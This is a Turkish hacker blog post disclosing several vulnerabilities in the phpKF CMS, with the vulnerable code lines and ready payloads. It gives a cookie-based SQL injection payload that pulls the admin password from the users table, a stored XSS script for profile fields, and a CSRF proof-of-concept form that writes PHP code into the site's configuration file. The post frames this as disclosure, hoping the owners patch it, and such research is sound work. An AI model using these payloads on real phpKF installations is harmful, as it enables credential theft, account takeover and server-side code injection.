Kendine Musluman

bir ruh hastasinin mâbedi..

phpKF - Multi Vulnerabilities (SQL Injection , XSS , CSRF)

Ahmethan G. · · Yorum Gönder
spyda mectruy paylaşmış dün gece benimde canım sıkılıyordu bi göz atayım dedim birsürü açık çıktı. script eski bunu göz önünde bulundurursak böyle açıklar normal. umarım sahipleri kısa zamanda görür ve kapatırlar.

# Title        : phpKF - MUlti Vulnerabilties
# Author       : BlackDewiL

   #Desc.        : Sinava 27gun var ugrastigimiz seylere bak aq

#Tested        : Windows 7 , Parrot OS

# mail-msn     : milit4rizm[at]gmail[dot]com

# Home         : http://kendinemuslum4n.blogspot.com & headshotz.org

# Date         : 18/05/2019

# greetz       : T3CH.L30N , init1ove , baybars , l4netly , Nicx , bozkurt97 , DeepiMpacT , KnockOut , DarkHunter
SQL Injection:

phpkf-yonetim/phpkf-bilesenler/guvenlik.php
Line : 69

    $vtsorgu = "SELECT id,yonetim_kimlik,kullanici_kimlik,yetki,son_hareket,kul_ip FROM $tablo_kullanicilar WHERE yonetim_kimlik='$_COOKIE[yonetim_kimlik]' AND kullanici_kimlik='$_COOKIE[kullanici_kimlik]' LIMIT 1";
payload:
    %bf%27 UNION SELECT sifre FROM phpkfcms_kullanicilar WHERE id='1
XSS Vuln:

mectruy'nin de buldugu bir xss var ama ben mec'in buldugu xss'i koymuyorum kendisi belki konu vs acmak ister. ben sadece kendi bulduklarimi yaziyorum.

/uye-profil.php?kp=degistir

payload: <script>alert(1)</script>

injectable area  : Imza and Hakkinda


CSRF Vuln:

 phpkf-yonetim/guncelle.php
Line : 29

if ( (isset($_POST['kurulum_yapildi'])) AND (isset($_POST['ayar_bilgi'])) AND ($_POST['kurulum_yapildi'] == 'ayar_dosyasi') )

PoC:

 
<form action = "http://localhost/phpkf-cms/phpkf-kurulum/guncelle.php" method = "POST">
<input type = "hidden" name = "kurulum_yapildi" value = "ayar_dosyasi">
<input type = "hidden" name = "ayar_bilgi" value = "<?=phpinfo();?>">
<input type = "submit" value = "git">
</form>
<span>b4style</span>


Önceki Kayıt

Hiç yorum yok

Kaydol: Atom / RSS

Be the first to comment.